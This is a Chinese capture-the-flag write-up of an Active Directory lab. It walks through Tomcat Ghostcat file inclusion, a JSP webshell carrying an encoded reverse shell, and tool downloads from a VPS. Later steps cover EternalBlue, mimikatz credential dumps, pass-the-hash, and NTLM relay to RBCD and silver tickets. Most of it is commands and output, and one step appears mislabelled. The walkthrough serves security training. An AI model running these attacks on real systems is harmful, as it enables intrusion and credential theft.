目录

flag1

fscan64 -h 39.98.109.172

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 39.98.109.172   is alive
[*] Icmp alive hosts len is: 1
39.98.109.172:8080 open
39.98.109.172:22 open
39.98.109.172:8009 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://39.98.109.172:8080 code:200 len:7091   title:后台管理
已完成 3/3
[*] 扫描结束,耗时: 38.7250974s

8080有网站

image-20231004235458639

dirsearch -u "http://39.98.109.172:8080/"
└─# dirsearch -u "http://39.98.109.172:8080/"

  _|. _ _  _  _  _ _|_    v0.4.2                                                                               
 (_||| _) (/_(_|| (_| )                                                                                        
                                                                                                               
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/39.98.109.172-8080/-_23-10-04_11-54-21.txt

Error Log: /root/.dirsearch/logs/errors-23-10-04_11-54-21.log

Target: http://39.98.109.172:8080/

[11:54:22] Starting: 
[11:54:22] 302 -    0B  - /js  ->  /js/                                    
[11:54:25] 200 -  114B  - /404.html                                         
[11:54:27] 400 -  795B  - /\..\..\..\..\..\..\..\..\..\etc\passwd           
[11:54:27] 400 -  795B  - /a%5c.aspx                                        
[11:54:35] 302 -    0B  - /css  ->  /css/                                   
[11:54:35] 302 -    0B  - /data  ->  /data/                                 
[11:54:36] 302 -    0B  - /docs  ->  /docs/                                 
[11:54:36] 200 -   17KB - /docs/                                            
[11:54:36] 200 -  132B  - /download/                                        
[11:54:36] 302 -    0B  - /download  ->  /download/                         
[11:54:37] 302 -    0B  - /examples  ->  /examples/                         
[11:54:37] 200 -  947B  - /examples/servlets/servlet/RequestHeaderExample   
[11:54:37] 200 -    1KB - /examples/
[11:54:37] 200 -  658B  - /examples/servlets/servlet/CookieExample          
[11:54:37] 200 -    6KB - /examples/servlets/index.html
[11:54:37] 200 -  680B  - /examples/jsp/snp/snoop.jsp                       
[11:54:38] 403 -    3KB - /host-manager/html                                
[11:54:38] 403 -    3KB - /host-manager/                                    
[11:54:38] 302 -    0B  - /images  ->  /images/                             
[11:54:39] 200 -    7KB - /index.html                                       
[11:54:40] 302 -    0B  - /lib  ->  /lib/                                   
[11:54:41] 302 -    0B  - /manager  ->  /manager/                           
[11:54:41] 403 -    3KB - /manager/                                         
[11:54:41] 403 -    3KB - /manager/admin.asp
[11:54:41] 403 -    3KB - /manager/login
[11:54:41] 403 -    3KB - /manager/html
[11:54:41] 403 -    3KB - /manager/VERSION
[11:54:41] 403 -    3KB - /manager/login.asp
[11:54:41] 403 -    3KB - /manager/html/
[11:54:41] 403 -    3KB - /manager/status/all
[11:54:41] 403 -    3KB - /manager/jmxproxy
[11:54:41] 403 -    3KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
[11:54:41] 403 -    3KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
[11:54:41] 403 -    3KB - /manager/jmxproxy/?set=Catalina%3Atype%3DValve%2Cname%3DErrorReportValve%2Chost%3Dlocalhost&att=debug&val=cow                                                                                       
[11:54:41] 403 -    3KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[11:54:41] 403 -    3KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS
[11:54:41] 403 -    3KB - /manager/jmxproxy/?qry=STUFF                      
[11:54:41] 403 -    3KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage&key=used
[11:54:41] 403 -    3KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
[11:54:49] 403 -    0B  - /upload                                           
[11:54:50] 403 -    0B  - /upload/                                          
[11:54:50] 403 -    0B  - /upload/upload.php
[11:54:50] 403 -    0B  - /upload/b_user.xls                                
[11:54:50] 403 -    0B  - /upload/test.php
[11:54:50] 403 -    0B  - /upload/1.php
[11:54:50] 403 -    0B  - /upload/loginIxje.php
[11:54:50] 403 -    0B  - /upload/b_user.csv
[11:54:50] 403 -    0B  - /upload/2.php                                     
[11:54:50] 403 -    0B  - /upload/test.txt
[11:54:50] 200 -    9KB - /user.html                                        
                                                                             
Task Completed

查看

/docs/

image-20231004235628348

发现是 Apache Tomcat Version 9.0.30, Dec 7 2019, 可以 CVE-2020-1938 AJP 文件包含

python3 ajpShooter.py http://39.98.109.172:8080 8009  /WEB-INF/web.xml read
└─# python3 ajpShooter.py http://39.98.109.172:8080 8009  /WEB-INF/web.xml read

       _    _         __ _                 _            
      /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __ 
     //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
    /  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |   
    \_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|   
         |__/|_|                                        
                                                00theway,just for test
    

[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"2489-1670857638305"
[<] Last-Modified: Mon, 12 Dec 2022 15:07:18 GMT
[<] Content-Type: application/xml
[<] Content-Length: 2489

<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
  <display-name>Archetype Created Web Application</display-name>

  <security-constraint>
    <display-name>Tomcat Server Configuration Security Constraint</display-name>
    <web-resource-collection>
      <web-resource-name>Protected Area</web-resource-name>
      <url-pattern>/upload/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>

  <error-page>
    <error-code>404</error-code>
    <location>/404.html</location>
  </error-page>

  <error-page>
    <error-code>403</error-code>
    <location>/error.html</location>
  </error-page>

  <error-page>
    <exception-type>java.lang.Throwable</exception-type>
    <location>/error.html</location>
  </error-page>

  <servlet>
    <servlet-name>HelloServlet</servlet-name>
    <servlet-class>com.example.HelloServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>HelloServlet</servlet-name>
    <url-pattern>/HelloServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>LoginServlet</display-name>
    <servlet-name>LoginServlet</servlet-name>
    <servlet-class>com.example.LoginServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>LoginServlet</servlet-name>
    <url-pattern>/LoginServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>RegisterServlet</display-name>
    <servlet-name>RegisterServlet</servlet-name>
    <servlet-class>com.example.RegisterServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>RegisterServlet</servlet-name>
    <url-pattern>/RegisterServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>UploadTestServlet</display-name>
    <servlet-name>UploadTestServlet</servlet-name>
    <servlet-class>com.example.UploadTestServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>UploadTestServlet</servlet-name>
    <url-pattern>/UploadServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>DownloadFileServlet</display-name>
    <servlet-name>DownloadFileServlet</servlet-name>
    <servlet-class>com.example.DownloadFileServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>DownloadFileServlet</servlet-name>
    <url-pattern>/DownloadServlet</url-pattern>
  </servlet-mapping>
</web-app>

/UploadServlet

可以结合文件包含实现rce

shell.txt

<%
    java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAta..LjUzLzU0IDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
%>

image-20231005000243292

/upload/555ece2d9133831410333f71cc95650d/20231005120227126.txt

文件包含

python3 ajpShooter.py http://39.98.109.172:8080/   8009 /upload/555ece2d9133831410333f71cc95650d/20231005120227126.txt   eval

image-20231005000427449

flag2

可以参考这个留个后门

LINUX留后门–教程(四)—— ssh 公钥免密_W小哥1的博客-CSDN博客

wget http://vps:port/fscan
wget http://vps:port/frpc
wget http://vps:port/frpc.ini
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.11.76  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::216:3eff:fe13:30ce  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:13:30:ce  txqueuelen 1000  (Ethernet)
        RX packets 139500  bytes 157280550 (157.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 51491  bytes 11575252 (11.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 684  bytes 58721 (58.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 684  bytes 58721 (58.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
./fscan -h 172.22.11.76/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.11.6     is alive
(icmp) Target 172.22.11.26    is alive
(icmp) Target 172.22.11.76    is alive
(icmp) Target 172.22.11.45    is alive
[*] Icmp alive hosts len is: 4
172.22.11.76:22 open
172.22.11.76:8080 open
172.22.11.26:445 open
172.22.11.45:445 open
172.22.11.6:445 open
172.22.11.45:139 open
172.22.11.6:139 open
172.22.11.26:139 open
172.22.11.45:135 open
172.22.11.26:135 open
172.22.11.6:135 open
172.22.11.6:88 open
172.22.11.76:8009 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo:
[*]172.22.11.6
   [->]XIAORANG-DC
   [->]172.22.11.6
[*] NetBios: 172.22.11.26    XIAORANG\XR-LCM3AE8B           
[+] 172.22.11.45        MS17-010        (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.11.6     [+]DC XIAORANG\XIAORANG-DC     
[*] NetInfo:
[*]172.22.11.26
   [->]XR-LCM3AE8B
   [->]172.22.11.26
[*] NetBios: 172.22.11.45    XR-DESKTOP.xiaorang.lab             Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
[*] WebTitle: http://172.22.11.76:8080  code:200 len:7091   title:后台管理
已完成 13/13
[*] 扫描结束,耗时: 8.436978072s

整理一下

172.22.11.6 XIAORANG-DC DC
172.22.11.26 XR-LCM3AE8B
172.22.11.76 本机
172.22.11.45 MS17-010 XR-DESKTOP

下一步打172.22.11.45,永恒之蓝,直接用msf打就可以了

挂个代理

chmod +x frpc
./frpc -c frpc.ini
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 172.22.11.45
exploit

image-20231005001435520

拿到shell,拿到flag2

image-20231005001530779

flag3

抓取hash

meterpreter >load kiwi
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > creds_all
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain    NTLM                              SHA1
--------     ------    ----                              ----
XR-DESKTOP$  XIAORANG  578bcc26fbbadeea510280fbfd3859e9  8d91913663e19059d5cfa1e2b2958fd97a407c78
yangmei      XIAORANG  25e42ef4cc0ab6a8ff9e3edbbda91841  6b2838f81b57faed5d860adaf9401b0edb269a6f

wdigest credentials
===================

Username     Domain    Password
--------     ------    --------
(null)       (null)    (null)
XR-DESKTOP$  XIAORANG  06 22 fe e0 24 5c 76 04 f3 2c 02 93 08 26 cd 3d 0d 36 b7 75 cf 23 18 a9 3c 0c 02 96 e1
                        52 5f 2a 4e 88 aa d4 ec 21 6e a2 8b 33 3b a8 cf f4 8e bf 2c 75 d0 b9 b9 92 53 65 b2 6
                       c 6f bf 18 06 59 4e c9 7f ff 5a 0f f4 b5 d9 60 eb 3b 63 ed ae dc 45 44 cd 4e e8 44 9b
                       6c 39 ce 2f 6e 12 c8 f7 a3 09 0c 2f a8 89 4a a0 92 29 33 27 0c f8 6c 3a 93 5e 6f 77 95
                        67 e4 36 1a ba 32 df 1a 07 28 39 ca 62 30 66 63 aa e8 57 c0 6b 7f d5 b8 26 a5 da 52 0
                       b 12 2e 6e c0 d0 3b 5c 94 30 d5 a4 c9 7b 24 50 41 02 22 e7 20 cf b4 bd 33 54 20 85 53
                       4d 30 58 76 3d fd e1 87 07 7f 51 9d cb 9f 94 7f 53 3e 9d 97 1a 85 47 51 0c e0 50 6b d3
                        48 2b e5 b6 9f fe ac 6a 00 da 1d 40 25 f4 96 96 bf a2 b0 aa ac 50 55 ca a5 3b d8 9c c
                       a 39 26 c5 dd 96 d9 da 85 e3 08
yangmei      XIAORANG  xrihGHgoNZQ

kerberos credentials
====================

Username     Domain        Password
--------     ------        --------
(null)       (null)        (null)
xr-desktop$  XIAORANG.LAB  06 22 fe e0 24 5c 76 04 f3 2c 02 93 08 26 cd 3d 0d 36 b7 75 cf 23 18 a9 3c 0c 02 9
                           6 e1 52 5f 2a 4e 88 aa d4 ec 21 6e a2 8b 33 3b a8 cf f4 8e bf 2c 75 d0 b9 b9 92 53
                            65 b2 6c 6f bf 18 06 59 4e c9 7f ff 5a 0f f4 b5 d9 60 eb 3b 63 ed ae dc 45 44 cd
                           4e e8 44 9b 6c 39 ce 2f 6e 12 c8 f7 a3 09 0c 2f a8 89 4a a0 92 29 33 27 0c f8 6c 3
                           a 93 5e 6f 77 95 67 e4 36 1a ba 32 df 1a 07 28 39 ca 62 30 66 63 aa e8 57 c0 6b 7f
                            d5 b8 26 a5 da 52 0b 12 2e 6e c0 d0 3b 5c 94 30 d5 a4 c9 7b 24 50 41 02 22 e7 20
                           cf b4 bd 33 54 20 85 53 4d 30 58 76 3d fd e1 87 07 7f 51 9d cb 9f 94 7f 53 3e 9d 9
                           7 1a 85 47 51 0c e0 50 6b d3 48 2b e5 b6 9f fe ac 6a 00 da 1d 40 25 f4 96 96 bf a2
                            b0 aa ac 50 55 ca a5 3b d8 9c ca 39 26 c5 dd 96 d9 da 85 e3 08
xr-desktop$  XIAORANG.LAB  (null)
yangmei      XIAORANG.LAB  xrihGHgoNZQ

wmiexec上去

proxychains impacket-wmiexec -hashes 00000000000000000000000000000000:48f6da83eb89a4da8a1cc963b855a799 Administrator@172.22.11.45

给yangmei添加到管理员里面

net localgroup administrators yangmei /add

使用bloodhound收集

python bloodhound.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab --dns-tcp -ns 172.22.11.6 -c all --zip

春秋云镜-【仿真场景】Spoofing writeup - 渗透测试中心 - 博客园 (cnblogs.com)

看大佬wp打了。。

  1. 使用Bloodhound收集到的用户名组合获取到的密码/hashes组合爆破,没发现其他新用户
  2. MAQ = 0,加不了计算机
  3. 当前LDAP 没 TLS,远程也加不了计算机,impacket的addcomputer有两种方法samr和ldaps。samr受到MAQ = 0的限制,无法添加计算机;ldaps受到 没TLS + MAQ = 0 的限制
  4. 域控存在nopac,当前用户yangmei使用nopac没打死,并且对域内computer container没有createchild的ACL
  5. 域控存在nopac,当前用户yangmei对当前windows机器xr-desktop没WriteDacl权限,意味着无法修改SamAccountName
  6. 域内存在 DFscoerce 和 petitpotam,但是不存在CVE-2019-1040,因此放弃 DFscoerce,优先使用petitpotam
  7. NoPac exploit: Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)

petitpotam扫描

proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M petitpotam

image-20231005003206141

无ADCS + Petitpotam + ntlm中继打法

攻击链:用petitpotam触发存在漏洞且开启了webclient服务的目标,利用petitpotam触发目标访问我们的http中继服务,目标将会使用webclient携带ntlm认证访问我们的中继,并且将其认证中继到ldap,获取到机器账户的身份,以机器账户的身份修改其自身的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性,允许我们的恶意机器账户模拟以及认证访问到目标机器 (RBCD)

满足条件,目标机器需要开启webclient服务

WebClient扫描,确定只能拿下 172.22.11.26 (XR-LCM3AE8B)

proxychains webclientservicescanner xiaorang.lab/yangmei:xrihGHgoNZQ@172.22.11.26 -no-validation
proxychains webclientservicescanner xiaorang.lab/yangmei:xrihGHgoNZQ@172.22.11.6 -no-validation
  • 继攻击前言:
    • 实战中的中继打法只需要停掉80占用服务,开启端口转发(portfwd,CS在后续版本中添加了rportfwd_local,直接转发到客户端本地)
    • 本次演示类似实战的打法,不选择把impacket丢到入口ubuntu上面这种操作
  1. 中继攻击环境配置: 端口转发 + 代理 我们目前需要把服务器的80,转发到客户端本地的80
  • 注意:由于SSH的反向端口转发监听的时候只会监听127.0.0.1,所以这时候需要点技巧 如图所示,即使反向端口转发79端口指定监听全部 (-R *:79:127.0.0.1:80),端口79依旧绑定在了127.0.0.1(图中顺便把socks5代理也开了)
ssh -i id_rsa_2048 root@39.98.120.46 -D 49.233.121.53:5002 -R \*:79:127.0.0.1:80
nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:79 &

image-20231005112104155

测试,从172.22.11.76:80 进来的流量直接转发到了我们本地

nc -lvvp 80
proxychains curl http://172.22.11.76:80

image-20231005112343690

本地开启ntlmrelayx

注意:

  • 前面提到,没有ldaps,所以不能使用addcomputer
  • 同时在使用proxychains后,ldap://后面只能接dc的ip
  • 利用前面拿下的XR-Desktop作为恶意机器账户设置RBCD
proxychains python ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access

使用Petitpotam触发 XR-LCM3AE8B 认证到172.22.11.76 (ubuntu)

proxychains impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :578bcc26fbbadeea510280fbfd3859e9 xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6

image-20231005120551383

可以看到,已经完成RBCD攻击了,接下来就是直接申请XR-LCM3AE8B的银票了

申请XR-LCM3AE8B CIFS票据。这里的hash是前面通过172.22.11.45,mimikatz抓取到的XR-DESKTOP用户的hash

proxychains impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :578bcc26fbbadeea510280fbfd3859e9 xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6

image-20231005121544516

然后本地会保存一个administrator.ccache的票据。然后就是利用这个银票,进行我们psexec连接

image-20231005121646535

image-20231005121706670

flag4

利用上面拿到的终端,加个管理员用户

net user test Abcd1234 /add
net localgroup administrators test /add

再回来看看信息

172.22.11.6 XIAORANG-DC DC
172.22.11.26 XR-LCM3AE8B
172.22.11.76 最先拿到shell的
172.22.11.45 MS17-010 XR-DESKTOP

远程桌面连接26。管理员运行猕猴桃,抓波密码。

C:\Users\test\Desktop>mimikatz

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 11118680 (00000000:00a9a858)
Session           : RemoteInteractive from 3
User Name         : test
Domain            : XR-LCM3AE8B
Logon Server      : XR-LCM3AE8B
Logon Time        : 2023/10/5 12:20:58
SID               : S-1-5-21-886837244-2534789743-3500935927-1002
        msv :
         [00000003] Primary
         * Username : test
         * Domain   : XR-LCM3AE8B
         * NTLM     : c780c78872a102256e946b3ad238f661
         * SHA1     : bc4e7d2a003b79bb6ffdfff949108220c1fad373
        tspkg :
        wdigest :
         * Username : test
         * Domain   : XR-LCM3AE8B
         * Password : (null)
        kerberos :
         * Username : test
         * Domain   : XR-LCM3AE8B
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 11118648 (00000000:00a9a838)
Session           : RemoteInteractive from 3
User Name         : test
Domain            : XR-LCM3AE8B
Logon Server      : XR-LCM3AE8B
Logon Time        : 2023/10/5 12:20:58
SID               : S-1-5-21-886837244-2534789743-3500935927-1002
        msv :
         [00000003] Primary
         * Username : test
         * Domain   : XR-LCM3AE8B
         * NTLM     : c780c78872a102256e946b3ad238f661
         * SHA1     : bc4e7d2a003b79bb6ffdfff949108220c1fad373
        tspkg :
        wdigest :
         * Username : test
         * Domain   : XR-LCM3AE8B
         * Password : (null)
        kerberos :
         * Username : test
         * Domain   : XR-LCM3AE8B
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 11104553 (00000000:00a97129)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/5 12:20:57
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * NTLM     : e4cee3293db1e3a139afc53875baf653
         * SHA1     : f78708e13d52b37483b58b1e3896d10bb3997315
        tspkg :
        wdigest :
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-LCM3AE8B$
         * Domain   : xiaorang.lab
         * Password : 6b 48 04 3e 10 8b c7 75 4f b1 48 eb a9 c7 22 49 61 94 02 ed 29 da 01 63 27 f4 74 f3 ed 1c ec 6d c6 43 64 b6 8f 8d 8a 73 f3 99 2e 90 1b cd fa 8f d8 77 af 0c 3f 7c a8 3d 08 c6 1a a3 6c ce a1 7e a1 f0 f1 0d 68 39 4b 49 34 ed 29 d6 a9 49 2b da 20 7f 9f d3 ce 6c fe 0c 00 1d 4d f3 0f e9 8d a7 bc 80 a6 a3 84 92 9c 83 c8 24 78 3f b0 5d 17 75 9f de 29 76 02 16 d6 01 d6 93 a9 8f 32 9f 14 7d b2 69 b5 47 78 26 9a 5d 6d 4d 49 f7 38 91 16 9b e5 00 bd bc 6b 28 07 6c 54 71 e2 2f 4d 28 d7 98 8d d7 2c 60 36 de 81 1b 27 1e c0 1e 71 96 51 66 44 5c 20 03 52 ca aa c7 ff ef 11 96 87 c6 a8 ca 72 19 04 35 96 ba 0f ec 04 b9 ec 10 1d 0f 45 77 e8 30 b0 2e e2 cc bd ff 35 8d f9 30 63 86 0b 13 a4 ef 74 f7 33 ce c8 f3 8a f4 9f 2f 1b b4 85 65
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 11103841 (00000000:00a96e61)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/5 12:20:57
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * NTLM     : e4cee3293db1e3a139afc53875baf653
         * SHA1     : f78708e13d52b37483b58b1e3896d10bb3997315
        tspkg :
        wdigest :
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-LCM3AE8B$
         * Domain   : xiaorang.lab
         * Password : 6b 48 04 3e 10 8b c7 75 4f b1 48 eb a9 c7 22 49 61 94 02 ed 29 da 01 63 27 f4 74 f3 ed 1c ec 6d c6 43 64 b6 8f 8d 8a 73 f3 99 2e 90 1b cd fa 8f d8 77 af 0c 3f 7c a8 3d 08 c6 1a a3 6c ce a1 7e a1 f0 f1 0d 68 39 4b 49 34 ed 29 d6 a9 49 2b da 20 7f 9f d3 ce 6c fe 0c 00 1d 4d f3 0f e9 8d a7 bc 80 a6 a3 84 92 9c 83 c8 24 78 3f b0 5d 17 75 9f de 29 76 02 16 d6 01 d6 93 a9 8f 32 9f 14 7d b2 69 b5 47 78 26 9a 5d 6d 4d 49 f7 38 91 16 9b e5 00 bd bc 6b 28 07 6c 54 71 e2 2f 4d 28 d7 98 8d d7 2c 60 36 de 81 1b 27 1e c0 1e 71 96 51 66 44 5c 20 03 52 ca aa c7 ff ef 11 96 87 c6 a8 ca 72 19 04 35 96 ba 0f ec 04 b9 ec 10 1d 0f 45 77 e8 30 b0 2e e2 cc bd ff 35 8d f9 30 63 86 0b 13 a4 ef 74 f7 33 ce c8 f3 8a f4 9f 2f 1b b4 85 65
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 11102640 (00000000:00a969b0)
Session           : Interactive from 3
User Name         : UMFD-3
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2023/10/5 12:20:57
SID               : S-1-5-96-0-3
        msv :
         [00000003] Primary
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * NTLM     : e4cee3293db1e3a139afc53875baf653
         * SHA1     : f78708e13d52b37483b58b1e3896d10bb3997315
        tspkg :
        wdigest :
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-LCM3AE8B$
         * Domain   : xiaorang.lab
         * Password : 6b 48 04 3e 10 8b c7 75 4f b1 48 eb a9 c7 22 49 61 94 02 ed 29 da 01 63 27 f4 74 f3 ed 1c ec 6d c6 43 64 b6 8f 8d 8a 73 f3 99 2e 90 1b cd fa 8f d8 77 af 0c 3f 7c a8 3d 08 c6 1a a3 6c ce a1 7e a1 f0 f1 0d 68 39 4b 49 34 ed 29 d6 a9 49 2b da 20 7f 9f d3 ce 6c fe 0c 00 1d 4d f3 0f e9 8d a7 bc 80 a6 a3 84 92 9c 83 c8 24 78 3f b0 5d 17 75 9f de 29 76 02 16 d6 01 d6 93 a9 8f 32 9f 14 7d b2 69 b5 47 78 26 9a 5d 6d 4d 49 f7 38 91 16 9b e5 00 bd bc 6b 28 07 6c 54 71 e2 2f 4d 28 d7 98 8d d7 2c 60 36 de 81 1b 27 1e c0 1e 71 96 51 66 44 5c 20 03 52 ca aa c7 ff ef 11 96 87 c6 a8 ca 72 19 04 35 96 ba 0f ec 04 b9 ec 10 1d 0f 45 77 e8 30 b0 2e e2 cc bd ff 35 8d f9 30 63 86 0b 13 a4 ef 74 f7 33 ce c8 f3 8a f4 9f 2f 1b b4 85 65
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 779444 (00000000:000be4b4)
Session           : RemoteInteractive from 2
User Name         : zhanghui
Domain            : XIAORANG
Logon Server      : XIAORANG-DC
Logon Time        : 2023/10/5 10:56:57
SID               : S-1-5-21-3598443049-773813974-2432140268-1133
        msv :
         [00000003] Primary
         * Username : zhanghui
         * Domain   : XIAORANG
         * NTLM     : 1232126b24cdf8c9bd2f788a9d7c7ed1
         * SHA1     : f3b66ff457185cdf5df6d0a085dd8935e226ba65
         * DPAPI    : 4bfe751ae03dc1517cfb688adc506154
        tspkg :
        wdigest :
         * Username : zhanghui
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : zhanghui
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 742685 (00000000:000b551d)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/5 10:56:56
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * NTLM     : f87bbea221c346a6578b5e937f207038
         * SHA1     : 318380b6fdd4556d540909a5c86a1bf191b2f0f5
        tspkg :
        wdigest :
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-LCM3AE8B$
         * Domain   : xiaorang.lab
         * Password : 7e 84 db cc ca 73 03 80 f7 29 81 e8 9a fe 5f f1 22 35 25 bb 96 3a 28 f5 3e e9 e7 09 9f 36 a4 11 b1 77 de a6 77 48 92 8b 49 49 c2 e8 02 16 89 fb 33 bd b5 2a f7 04 62 74 db 1e c3 ba bd 63 f8 b0 d1 ec 46 50 4e 04 38 6d a7 a4 7e 0d 1a 4d 06 5a 73 6e 11 71 11 e2 7f 9b 8e 7f 68 6a 8f 23 6e 38 66 a5 76 95 65 1d 1a 38 24 fc 64 e2 ca 83 c4 87 57 ec 28 eb fe 15 50 c1 55 b2 22 46 1a 2d 7b 50 d0 71 b5 90 86 90 da 4b a8 51 2a 85 9b 38 e0 0f ea 2a 67 18 3c 8d f4 5e 3a 50 2b 57 b3 55 c5 b6 48 5a af 8c 3c f6 f4 09 0e f4 d9 ff f3 3d a2 f7 87 eb 33 02 d3 f9 d1 da b7 ac 37 14 0a 50 cc 3b ca d1 6f 0a c2 a0 73 81 75 65 91 85 95 dd 60 c6 a9 e1 1f 43 9c 4c 81 91 b5 77 ed 2d 28 5d c8 0f 1a 06 c8 89 44 64 65 11 f2 36 37 13 7c ef 8b 56
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 742103 (00000000:000b52d7)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
